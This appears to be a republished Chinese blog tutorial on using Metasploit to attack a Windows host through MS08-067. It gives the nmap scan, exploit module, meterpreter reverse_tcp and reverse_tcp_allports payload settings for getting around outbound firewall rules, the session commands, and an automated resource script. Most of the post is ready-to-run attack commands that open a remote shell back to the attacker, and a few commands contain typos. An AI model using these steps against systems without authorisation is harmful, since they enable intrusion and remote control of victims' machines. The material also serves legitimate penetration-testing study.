metasploit——(三)滲透攻擊之旅


以下利用metasploit攻擊網站的具體思路:

  1、先判斷開放了哪些端口  

    nmap  -sT -A  --script=smb-vuln-ms08-067  -P0 192.167.2.2

  2、根據開放的端口服務,尋找相應的漏洞攻擊模塊

    search  ms08-067_netapi

    use exploit/windows/smb/ms08-067_netapi

    show payload   尋找適合這個模塊的攻擊載荷

    set  payload  windows/meterpreter/reverse_tcp

    show  options   查看需要設置哪些參數

    set  LHOST xxxx

    set  RHOST  xxx

    set  LPORT   xx

    exploit    對目標嘗試攻擊。

    反彈回   meterpreter  shell

 

  在上面的例子中,我們之所以能夠成功,主要是由於目標主機反彈連接使用的端口沒有被過濾掉。但是如果我們攻擊的組織內部設置了非常嚴格的出站端口怎么辦?我們可以猜測443端口沒有被防火牆禁止,同樣的可能還有FTP、telnet、ssh等服務使用的端口,可以逐一嘗試。。幸運的是,metasploit提供了一個專用的攻擊載荷幫助我們找到這些放行的端口。。

下面我們使用這個攻擊載荷,讓它嘗試對所有端口進行連接,直到找到成功連接的端口為止。。

    use exploit/windows/smb/ms08-067_netapi

    set  LHOST xxxx

    set  RHOST  xxx

    set  LPORT   xx

    search ports

    set payload windows/meterpreter/reverse_tcp_allports

    exploit  -j          返回結果會顯示出與目標主機的哪個端口建立了連接。。

    session  -l  -v     返回session 的 ID

    session   -i    id號

    最后反彈回   meterpreter

 

以下是一些其他相關信息:

  資源文件:是msf終端內包含一系列自動化命令的腳本文件。。。

    比如:  echo  use  exploit/windows/smb/ms08_067_netapi  > autoexploit.rc

       echo  set RHOST  1.2.3.2      >> autoexploit.rc

        echo exploit   >> autoexploit.rc  (此處有省略)

       進入msf終端    運行    resource   autoexxploit.rc    回車

        autoexploit.rc文件內的命令就會依次執行。。。。可以大大減少測試和開發的時間。。。

        

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM